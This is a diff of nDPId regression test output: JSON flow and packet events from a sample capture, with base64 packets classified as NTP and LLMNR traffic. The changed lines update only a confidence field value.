00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1470104425762,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104425762,"pkt":"\/\/\/\/\/\/\/\/wKC7c+snCABFAAFZOwBAAEARM+XAqAoH\/\/\/\/\/\/YA9gABRUMe\/\/+fLaAAwKC7c+snwKgKBwAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+snQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDIzAAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqAoH\/\/8AAFBvcnQgOAAAAAAAAAAAAAAAAAAAAAAAAAA="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1470104425786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104425786,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0xkFAAEAGbFvAqAUQROn9hdFtAFBAFGHVDj7nf4AREAFpCQAAAQEIChoPxgTPHNz0"} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1336,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1470104426276,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104426276,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6UAAIARUUHAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1470104426973,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1470104426973,"pkt":"TF4M6gNlYMVHBbyMCABFwABMyLEAAEARvv3AqAUQEf0afQB7AHsAOHvnIwIG7AAAJiAAAPbJEf0afdtKfo89Puc520qBhKZDx2jbSoGEtCSHfttKgew\/d58s"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426992,"flow_last_seen":1470104426992,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104426992,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1470104426992,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1470104426992,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQAD3zwU6wAi91hE5AAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426992,"flow_last_seen":1470104426992,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104426992,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426992,"flow_last_seen":1470104426992,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104426992,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1470104427094,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1470104427094,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQAD3zwU6wAi91hE5AAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104427094,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1470104427094,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104427094,"pkt":"AQBeAAD8SNIkYwreCABFAAA2fkcAAAERlKLAqAUp4AAA\/NkpFOsAIt1BROQAAAABAAAAAAAACGtldmluLVBDAAD\/AAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104427094,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104427094,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104429964,"flow_last_seen":1470104429964,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104429964,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1470104429964,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104429964,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MWEAAAER4XjAqAU54AAA\/PusFOsAIt9AFnIAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104429964,"flow_last_seen":1470104429964,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104429964,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104429964,"flow_last_seen":1470104429964,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104429964,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430064,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1470104430064,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"thread_ts_msec":1470104430064,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQAD3zcU6wAl4fcCawAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430064,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430064,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430065,"flow_last_seen":1470104430065,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430065,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1470104430065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104430065,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S8AAAAERxx3AqAUy4AAA\/N83FOsAJVssAmsAAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430065,"flow_last_seen":1470104430065,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430065,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430065,"flow_last_seen":1470104430065,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430065,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1470104430065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104430065,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MWMAAAER4XbAqAU54AAA\/PusFOsAIt9AFnIAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1470104430476,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104430476,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S8EAAAERxxzAqAUy4AAA\/N83FOsAJVssAmsAAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1470104430884,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"thread_ts_msec":1470104430884,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQADwmYU6wAlV+upSAAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1470104430884,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104430884,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S8UAAAERxxjAqAUy4AAA\/MJmFOsAJdEfqUgAAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1403,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1470104431294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"thread_ts_msec":1470104431294,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQADwmYU6wAlV+upSAAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104432318,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1470104432318,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104432318,"pkt":"AQBeAAD8SNIkYzEACABFAAA2OyoAAAER17zAqAUs4AAA\/Oa2FOsAIkMsz20AAAABAAAAAAAACGphc29uLVBDAAD\/AAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104432318,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104432318,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 